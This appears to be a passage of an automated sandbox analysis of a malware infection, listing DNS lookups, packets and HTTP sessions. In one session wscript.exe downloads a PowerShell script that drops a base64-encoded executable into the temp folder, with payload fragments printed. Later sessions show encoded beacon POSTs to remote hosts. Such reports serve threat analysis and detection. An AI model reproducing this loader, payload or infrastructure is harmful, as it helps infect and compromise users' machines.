                                                                                  Feb 18, 2025 08:09:22.983061075 CET4999580192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:24.031657934 CET4999680192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:24.036997080 CET8049996104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:24.037089109 CET4999680192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:24.072627068 CET4999680192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:24.078135967 CET8049996104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:24.078284025 CET8049996104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:24.762393951 CET8049996104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:24.762558937 CET8049996104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:24.762614012 CET4999680192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:25.576915979 CET4999680192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:26.595876932 CET4999780192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:26.601294994 CET8049997104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:26.601409912 CET4999780192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:26.610836983 CET4999780192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:26.616959095 CET8049997104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:27.322196007 CET8049997104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:27.322218895 CET8049997104.21.112.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:27.322437048 CET4999780192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:27.572854996 CET4999780192.168.2.6104.21.112.1
                                                                                  Feb 18, 2025 08:09:27.577759027 CET8049997104.21.112.1192.168.2.6

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 18, 2025 08:08:34.260288954 CET4949353192.168.2.61.1.1.1
                                                                                  Feb 18, 2025 08:08:34.733726978 CET53494931.1.1.1192.168.2.6
                                                                                  Feb 18, 2025 08:08:50.377409935 CET5713153192.168.2.61.1.1.1
                                                                                  Feb 18, 2025 08:08:50.734520912 CET53571311.1.1.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:04.065742016 CET5911353192.168.2.61.1.1.1
                                                                                  Feb 18, 2025 08:09:05.076967955 CET5911353192.168.2.61.1.1.1
                                                                                  Feb 18, 2025 08:09:05.084028959 CET53591131.1.1.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:05.084043026 CET53591131.1.1.1192.168.2.6
                                                                                  Feb 18, 2025 08:09:18.694955111 CET6388753192.168.2.61.1.1.1
                                                                                  Feb 18, 2025 08:09:18.708254099 CET53638871.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Feb 18, 2025 08:08:34.260288954 CET192.168.2.61.1.1.10x37caStandard query (0)www.l63339.xyzA (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:08:50.377409935 CET192.168.2.61.1.1.10x46e1Standard query (0)www.seasay.xyzA (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:04.065742016 CET192.168.2.61.1.1.10x6048Standard query (0)www.tumbetgirislinki.fitA (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.076967955 CET192.168.2.61.1.1.10x6048Standard query (0)www.tumbetgirislinki.fitA (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.694955111 CET192.168.2.61.1.1.10xf9ccStandard query (0)www.lucynoel6465.shopA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Feb 18, 2025 08:08:34.733726978 CET1.1.1.1192.168.2.60x37caNo error (0)www.l63339.xyz162.218.30.235A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:08:50.734520912 CET1.1.1.1192.168.2.60x46e1No error (0)www.seasay.xyz103.106.67.112A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084028959 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:05.084043026 CET1.1.1.1192.168.2.60x6048No error (0)www.tumbetgirislinki.fit104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Feb 18, 2025 08:09:18.708254099 CET1.1.1.1192.168.2.60xf9ccNo error (0)www.lucynoel6465.shop104.21.80.1A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • 196.251.92.64
                                                                                  • www.l63339.xyz
                                                                                  • www.seasay.xyz
                                                                                  • www.tumbetgirislinki.fit
                                                                                  • www.lucynoel6465.shop

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649741196.251.92.64805980C:\Windows\System32\wscript.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:07:29.014492035 CET332OUTGET /crypt/laser.ps1 HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-ch
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: 196.251.92.64
                                                                                  Connection: Keep-Alive
                                                                                  Feb 18, 2025 08:07:29.726855040 CET1236INHTTP/1.1 200 OK
                                                                                  Date: Tue, 18 Feb 2025 07:07:29 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Tue, 18 Feb 2025 00:13:42 GMT
                                                                                  ETag: "865d0-62e5f8376390b"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 550352
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Data Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 48 37 51 73 32 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 67 45 4c 41 54 41 41 41 45 49 47 41 41 42 49 42 67 41 41 41 41 41 41 78 6d 41 47 41 41 41 67 41 41 41 41 67 41 59 [TRUNCATED]
                                                                                  Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAH7Qs2cAAAAAAAAAAOAADgELATAAAEIGAABIBgAAAAAAxmAGAAAgAAAAgAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADABgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGxgBgBXAAAAAKAGAJgFAAAAAAAAAAAAAAAAAAAAAAAAAIAGAAwAAACo9gUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAzEAGAAAgAAAAQgYAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAYAAAIAAABEBgAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACYBQAAAKAGAAAGAAAARgYAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACoYAYAAAAAAEgAAAACAAUAHPcFAFBpAAADAAAABAAABhRJAACUrQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKB0AAAYAKgAAAAMwCQAIAAAAAAAAAAIoEAAABgAqEzAEAE0AAAABAAAR
                                                                                  Feb 18, 2025 08:07:29.726876020 CET1236INData Raw: 63 79 55 41 41 41 59 4b 42 69 6a 34 41 41 41 47 4a 53 5a 39 42 67 41 41 42 41 59 43 66 51 63 41 41 41 51 47 41 33 30 49 41 41 41 45 42 67 52 39 43 51 41 41 42 41 59 57 4b 43 6f 41 41 41 5a 39 42 51 41 41 42 41 5a 38 42 67 41 41 42 42 49 41 4b 41
                                                                                  Data Ascii: cyUAAAYKBij4AAAGJSZ9BgAABAYCfQcAAAQGA30IAAAEBgR9CQAABAYWKCoAAAZ9BQAABAZ8BgAABBIAKAEAACsGfAYAAAQodQAABioAAAATMAQARQAAAAIAABEAFygxAAAGJSYoLwEABgofQigxAAAGJSYoLwEABiUmCx9bKDEAAAYlJgwIBgcoAwAABiUmKEoAAAYlJg0SAyjUAAAGACoAAAATMAQAFwAAAAMAABEAAigvAQA
                                                                                  Feb 18, 2025 08:07:29.726898909 CET1236INData Raw: 41 41 52 37 44 51 41 41 42 41 59 6f 46 41 41 41 42 69 55 6d 48 31 41 6f 4b 67 41 41 42 76 34 42 4b 77 63 66 56 43 67 71 41 41 41 47 44 41 67 73 46 51 41 67 56 4d 59 4c 41 43 67 78 41 41 41 47 4a 53 59 6f 36 41 41 41 42 69 55 6d 65 67 41 47 44 53
                                                                                  Data Ascii: AAR7DQAABAYoFAAABiUmH1AoKgAABv4BKwcfVCgqAAAGDAgsFQAgVMYLACgxAAAGJSYo6AAABiUmegAGDSsACSoTMAYAIQAAAAgAABEAH1goKgAABgoCAwQfXCgqAAAGEgAoGAAABiUmCysAByoAAAATMAYAcAAAAAkAABEABAUfYCgqAAAGWChkAQAGJSYKAgMGH2QoKgAABh9oKCoAAAYoFgAABiUmCwcfbCgqAAAG/gEMCCw
                                                                                  Feb 18, 2025 08:07:29.726959944 CET1236INData Raw: 4b 42 49 41 41 41 59 72 43 69 44 55 41 41 41 41 4b 43 6f 41 41 41 59 4e 41 41 6b 67 32 41 41 41 41 43 67 71 41 41 41 47 2f 67 45 54 42 68 45 47 4c 42 38 62 52 51 45 41 41 41 44 32 2f 2f 2f 2f 41 43 43 46 78 77 73 41 4b 44 45 41 41 41 59 6c 4a 69
                                                                                  Data Ascii: KBIAAAYrCiDUAAAAKCoAAAYNAAkg2AAAACgqAAAG/gETBhEGLB8bRQEAAAD2////ACCFxwsAKDEAAAYlJijoAAAGJSZ6fwQAAAR7DQAABCgRAAAGINwAAAAoKgAABv4BEwcRBywfHUUBAAAA9v///wAgxscLACgxAAAGJSYo6AAABiUmeioDMAkABwAAAAAAAAACKGIAAAoqABMwAgAHAAAADAAAEQACCisABioAAzAJAAgAAAA
                                                                                  Feb 18, 2025 08:07:29.726972103 CET896INData Raw: 33 41 67 73 45 52 31 46 41 51 41 41 41 50 62 2f 2f 2f 38 49 4b 46 67 41 41 41 59 41 33 41 63 73 42 77 63 6f 57 41 41 41 42 67 44 63 42 69 77 52 47 55 55 42 41 41 41 41 39 76 2f 2f 2f 77 59 6f 57 41 41 41 42 67 44 63 45 51 51 71 41 41 41 42 4e 41
                                                                                  Data Ascii: 3AgsER1FAQAAAPb///8IKFgAAAYA3AcsBwcoWAAABgDcBiwRGUUBAAAA9v///wYoWAAABgDcEQQqAAABNAAAAgCNAC+8AB4AAAAAAgB5AGHaABUAAAAAAgBzAHzvAAsAAAAAAgAJAPH6ABUAAAAAAzAJAAgAAAAAAAAAAigrAAAKACobMAUAzAAAABIAABECewUAAAQKAAICewcAAAQCewgAAAQCewkAAAQoBQAABiUmfQoAAAQ
                                                                                  Feb 18, 2025 08:07:29.846261024 CET1236INData Raw: 2f 33 34 5a 41 41 41 45 41 35 45 67 66 2f 2f 2f 2f 31 38 65 59 67 6f 47 66 68 6b 41 41 41 51 44 46 31 69 52 59 41 6f 44 47 46 6a 2b 43 77 45 41 4b 30 46 2b 47 51 41 41 42 41 4f 52 49 44 2f 2f 2f 2f 39 66 48 78 68 69 43 67 5a 2b 47 51 41 41 42 41
                                                                                  Data Ascii: /34ZAAAEA5Egf////18eYgoGfhkAAAQDF1iRYAoDGFj+CwEAK0F+GQAABAORID////9fHxhiCgZ+GQAABAMXWJEfEGJgCgZ+GQAABAMYWJEeYmAKBn4ZAAAEAxlYkWAKAxpY/gsBAAYXLwEqfhkAAAQDAhYGKBwAAAoqEzAFAFgAAAATAAARfhwAAAQtUB1FAQAAAPb///8XLQbQLwAABiZydQAAcAoGKD8AAAolJgsoZAAACgc
                                                                                  Feb 18, 2025 08:07:29.846285105 CET224INData Raw: 4b 44 67 41 41 41 59 4b 33 67 41 47 4b 67 41 41 41 52 41 41 41 41 41 41 41 41 41 4c 43 77 41 4e 49 51 41 41 41 52 4d 77 42 77 42 64 41 77 41 41 47 51 41 41 45 51 4d 6f 6b 67 41 41 42 69 55 6d 43 67 59 4c 66 6d 34 41 41 41 51 4d 46 77 30 72 44 51
                                                                                  Data Ascii: KDgAAAYK3gAGKgAAARAAAAAAAAALCwANIQAAARMwBwBdAwAAGQAAEQMokgAABiUmCgYLfm4AAAQMFw0rDQYomgAABiUmJgkXWA0JGjLvG0UBAAAA9v///xctBtA4AAAGJgYomgAABiUm0RMEEQRm0RMEEQQYXzn7AQAAG0UBAAAA9v///yjQAAAGJSYTBR4oVwEABiUmEwYGEQYWHiijAAAGJSYmEQUR
                                                                                  Feb 18, 2025 08:07:29.846297979 CET1236INData Raw: 42 69 68 4a 41 51 41 47 48 69 68 58 41 51 41 47 4a 53 59 54 42 77 59 52 42 78 59 65 4b 4b 4d 41 41 41 59 6d 46 78 4d 49 45 51 63 54 46 68 59 54 46 79 73 67 45 52 59 52 46 35 45 54 43 52 45 4a 4c 41 38 63 52 51 45 41 41 41 44 32 2f 2f 2f 2f 46 68
                                                                                  Data Ascii: BihJAQAGHihXAQAGJSYTBwYRBxYeKKMAAAYmFxMIEQcTFhYTFysgERYRF5ETCREJLA8cRQEAAAD2////FhMIKx4RFxdYExcRFxEWKFwBAAYlJmky0h1FAQAAAPb///8RCCwYHEUBAAAA9v///yhxAAAGKDUAAAYlJhMHEQURByjsAAAGfiEAAAQtRBdFAQAAAPb///9+HwAABCD///9/Mx8dRQEAAAD2////fiEAAAQGKEUBAAY
                                                                                  Feb 18, 2025 08:07:29.846311092 CET1236INData Raw: 4a 53 59 6f 62 77 41 41 43 69 55 6d 44 43 73 6f 66 6a 6f 41 41 41 51 54 44 68 49 4f 41 79 68 75 41 41 41 4b 4a 53 5a 2b 4f 67 41 41 42 42 4d 50 45 67 38 45 4b 47 30 41 41 41 6f 6f 63 41 41 41 43 69 55 6d 44 41 67 6f 4f 41 45 41 42 69 55 6d 43 39
                                                                                  Data Ascii: JSYobwAACiUmDCsofjoAAAQTDhIOAyhuAAAKJSZ+OgAABBMPEg8EKG0AAAoocAAACiUmDAgoOAEABiUmC94DJv4aBiAoBAAAb3EAAAolJhMQFhMROLIBAAAREBERmg0Hb3IAAAolJiwhHEUBAAAA9v///wlvcwAACiUmByh0AAAKJSYTBDhtAQAAB291AAAKJSYTBREFKFQAAAZpF1gTBhEGKEsAAAYTBwdvdgAACiUmb3cAAAo
                                                                                  Feb 18, 2025 08:07:29.846322060 CET1236INData Raw: 43 42 64 59 45 77 67 52 43 42 45 47 4d 75 4e 2b 59 41 41 41 43 67 64 76 64 67 41 41 43 69 55 6d 45 51 63 47 46 33 4e 37 41 41 41 4b 45 77 6b 52 43 57 39 38 41 41 41 4b 4a 53 59 54 43 68 45 47 46 6a 45 57 47 55 55 42 41 41 41 41 39 76 2f 2f 2f 78
                                                                                  Data Ascii: CBdYEwgRCBEGMuN+YAAACgdvdgAACiUmEQcGF3N7AAAKEwkRCW98AAAKJSYTChEGFjEWGUUBAAAA9v///xEKfn0AAApvfgAAChEGFzEWGkUBAAAA9v///xEKfn8AAApvfgAAChEGGDEMEQp+gAAACm9+AAAKEQYZMQwRCn6BAAAKb34AAAoRBhoxKRdFAQAAAPb///8aEwsrFBEKfoIAAAoRC2+DAAAKEQsXWBMLEQsRBjLmEQp
                                                                                  Feb 18, 2025 08:07:29.846337080 CET672INData Raw: 45 52 41 6f 42 51 45 41 42 69 55 6d 61 54 2b 51 2f 76 2f 2f 47 6b 55 42 41 41 41 41 39 76 2f 2f 2f 79 6f 41 51 54 51 41 41 41 41 41 41 41 41 41 41 41 41 41 66 67 41 41 41 48 34 41 41 41 41 44 41 41 41 41 45 67 41 41 41 51 41 41 41 41 43 65 41 41
                                                                                  Data Ascii: ERAoBQEABiUmaT+Q/v//GkUBAAAA9v///yoAQTQAAAAAAAAAAAAAfgAAAH4AAAADAAAAEgAAAQAAAACeAAAAUAEAAO4BAAADAAAAEgAAAVYgEgAAAiAHAAAKIP///wAoPAAABioAADZ+aQAABAIDKEUAAAYqAABWIBMAAAIgCAAACiD///8AKDwAAAYqAAAyfmoAAAQCKEkAAAYqAAAAHgKNVQAAASpWIBUAAAIgCQAACiD///8


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649984162.218.30.235803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:08:34.759187937 CET558OUTGET /vhr7/?cf2hYv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM=&WHYh=mJr4VrfpGDBp HTTP/1.1
                                                                                  Host: www.l63339.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Feb 18, 2025 08:08:35.324683905 CET455INHTTP/1.1 302 Redirect
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/
                                                                                  Server: Microsoft-IIS/10.0
                                                                                  Date: Tue, 18 Feb 2025 07:08:34 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 200
                                                                                  Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 38 36 38 38 34 2f 76 68 72 37 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                                                                  Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/"></a></body>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649985103.106.67.112803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:08:50.756853104 CET804OUTPOST /c9ts/ HTTP/1.1
                                                                                  Host: www.seasay.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.seasay.xyz
                                                                                  Referer: http://www.seasay.xyz/c9ts/
                                                                                  Content-Length: 211
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 4d 37 4b 64 32 39 67 73 41 36 2f 37 5a 63 48 7a 7a 59 47 53 30 39 63 4f 4a 54 6a 47 78 4a 32 4e 48 58 31 6b 7a 2b 2b 6a 48 5a 6a
                                                                                  Data Ascii: cf2hYv=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1M7Kd29gsA6/7ZcHzzYGS09cOJTjGxJ2NHX1kz++jHZj
                                                                                  Feb 18, 2025 08:08:51.405761003 CET240INHTTP/1.1 302 Found
                                                                                  Location: https://www.seasay.xyz/c9ts/
                                                                                  Server: Dynamic Http Server
                                                                                  X-Ratelimit-Limit: 101
                                                                                  X-Ratelimit-Remaining: 100
                                                                                  X-Ratelimit-Reset: 1
                                                                                  Date: Tue, 18 Feb 2025 07:08:51 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649986103.106.67.112803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:08:53.303124905 CET828OUTPOST /c9ts/ HTTP/1.1
                                                                                  Host: www.seasay.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.seasay.xyz
                                                                                  Referer: http://www.seasay.xyz/c9ts/
                                                                                  Content-Length: 235
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 6d 79 57 4d 56 5a 58 4a 76 49 79 6d 35 75 36 42 78 48 63 6e 56 33 6b 7a 45 39 70 75 72 61 75 6f 79 68 70 4f 51 74 73 31 58 79 46 55 46 75 74 46 78 59 69 59 4b 50 73 54 44 68 31 59 32 72 49 30 44 34 49 6f 33 51 6f 58 44 45 53 79 71 7a 6d 4c 58 5a 69 6f 64 6d 78 4c 70 55 31 58 49 32 4c 34 4f 6e 4b 37 2b 52 45 75 43 32 52 44 32 57 75 53 49 42 34 36 32 51 6a 2f 33 42 35 62 31 76 6b 75 33 47 5a 46 75 61 50 67 65 2b 42 77 55 43 4b 39 50 2f 65 71 2b 79 7a 43 6d 35 78 7a 68 36 69 2b 76 42 64 76 41 59 6c 41 6b 64 65 4f 4c 4c 52 47 52 4a 63 50 48 76 31 32 6b 79 5a 73 7a 38 41 42 4c 6f 78 34 30 41 32 57 72 6f 38 6a 30 51 47 49 68 41 56 63 51 3d 3d
